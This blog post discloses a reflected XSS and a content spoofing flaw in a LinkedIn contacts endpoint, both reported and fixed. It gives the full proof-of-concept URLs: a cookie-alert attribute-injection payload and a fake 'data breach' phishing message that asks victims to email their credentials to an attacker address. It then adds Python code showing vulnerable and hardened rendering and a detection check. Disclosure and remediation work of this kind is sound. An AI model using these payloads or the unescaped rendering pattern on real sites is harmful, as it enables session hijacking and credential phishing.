A couple of days back, I reported an XSS and a Content Spoofing issue on LinkedIn. Here are the details of the issues.
Cross Site Scripting
What is Cross Site Scripting?
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the user's current session or changing the look of the page by rewriting its HTML on the fly to steal the user's credentials. It happens because input entered by a user is interpreted as HTML/JavaScript/VBScript by the browser instead of being treated as data.
URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400%20height=400%20onmouseover=alert(document.cookie);&name=Sunil&first_name=Yadav&headline=&_=1382600845381
Vulnerable Parameter: profile_image_url
Content Spoofing
What is Content Spoofing?
Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user that is made possible by an injection vulnerability in a web application. When an application does not properly handle user-supplied data, an attacker can supply content to the web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain, so the injected text inherits the site's credibility.
URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400 height=400&name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&first_name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&headline=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&_=1382600845381
Vulnerable Parameters: profile_image_url,name,first_name,headline
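To make the fix concrete, here is an added example (my own illustration, not LinkedIn's code) that models the connect-div endpoint the URLs above hit. It assumes a hypothetical server-side directory keyed by invitee_linkedin_id, an assumed image-host allowlist and fallback avatar path, and constructed request data. It shows the vulnerable rendering beside a hardened one that addresses both findings: the attribute injection through profile_image_url (unquoted, unvalidated attribute) and the reflected text through name, first_name and headline (display text taken from the URL rather than from the server's own record).

```python
import html
import re
from urllib.parse import urlparse

# Added example, not LinkedIn's code. The paths, hosts and directory below are assumed.
FALLBACK_IMAGE = "/static/default-avatar.png"   # assumed fallback avatar
IMAGE_HOSTS = ("media.example.com",)             # assumed allowlist of image CDNs
MAX_TEXT = 80                                    # cap on rendered display text

# Constructed server-side directory keyed by invitee id (names are made up).
DIRECTORY = {
    "30680542": {"first_name": "Yadav", "name": "Sunil", "headline": "Security Consultant"},
    "11111111": {"first_name": "Ada", "name": "<b>Lovelace</b>", "headline": 'Says "hi"'},
}


def render_vulnerable(params):
    """Before: unquoted img attribute and raw interpolation of every request parameter.

    A value containing whitespace breaks out of src= and becomes new attributes,
    and any text supplied in the URL is shown as if the site had written it."""
    return (
        "<div class='connect'>"
        f"<img src={params['profile_image_url']} alt=avatar>"
        f"<span class='name'>{params['first_name']} {params['name']}</span>"
        f"<p class='headline'>{params['headline']}</p>"
        "</div>"
    )


def safe_image_url(url):
    """Keep only an absolute http(s) URL on an allowlisted host that contains no
    whitespace or quoting characters; anything else falls back to a fixed image."""
    if not re.fullmatch(r"""https?://[^\s"'<>]+""", url):
        return FALLBACK_IMAGE
    if urlparse(url).hostname not in IMAGE_HOSTS:
        return FALLBACK_IMAGE
    return url


def clean_text(value):
    """Collapse whitespace/newlines and cap the length of display text."""
    return " ".join(value.split())[:MAX_TEXT]


def render_hardened(params):
    """After: display text comes from the server-side record for invitee_linkedin_id
    (the URL's name/first_name/headline are ignored), the image URL is validated,
    and every value is HTML-escaped inside a quoted attribute or element body."""
    record = DIRECTORY.get(params.get("invitee_linkedin_id"))
    if record is None:
        return '<div class="connect">Unknown invitee</div>'
    src = html.escape(safe_image_url(params.get("profile_image_url", "")), quote=True)
    first = html.escape(clean_text(record["first_name"]), quote=True)
    last = html.escape(clean_text(record["name"]), quote=True)
    headline = html.escape(clean_text(record["headline"]), quote=True)
    return (
        '<div class="connect">'
        f'<img src="{src}" alt="avatar">'
        f'<span class="name">{first} {last}</span>'
        f'<p class="headline">{headline}</p>'
        "</div>"
    )


# Characters that should never survive verbatim into an attribute or element:
# tag/quote characters, or whitespace followed by what looks like a new attribute.
BREAKOUT = re.compile(r"""[<>"']|\s\w+=""")


def reflects_raw(params, body):
    """Detection helper: parameters whose value is echoed verbatim into the response
    and carries attribute/tag break-out characters."""
    return sorted(k for k, v in params.items() if v and v in body and BREAKOUT.search(v))


if __name__ == "__main__":
    # Constructed request modelled on the post's attribute-injection parameter.
    req = {
        "invitee_linkedin_id": "30680542",
        "profile_image_url": "http://img.example.net/logo.png width=400 onmouseover=alert(1)",
        "name": "Sunil", "first_name": "Yadav", "headline": "",
    }
    print(render_vulnerable(req))
    print(render_hardened(req))
    print(reflects_raw(req, render_vulnerable(req)))
```

The key design point for the spoofing half is that escaping alone is not enough: a fully escaped sentence about a "data breach" still reads as LinkedIn's own words. The hardened renderer therefore resolves the display text from the invitee id on the server and never echoes the URL's text fields at all; escaping and the quoted, validated src attribute then close the XSS vector. reflects_raw is a cheap regression check to run against responses in a test suite.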
Both issues were fixed in a short time. Thank you, LinkedIn Security Team 🙂
Anonymous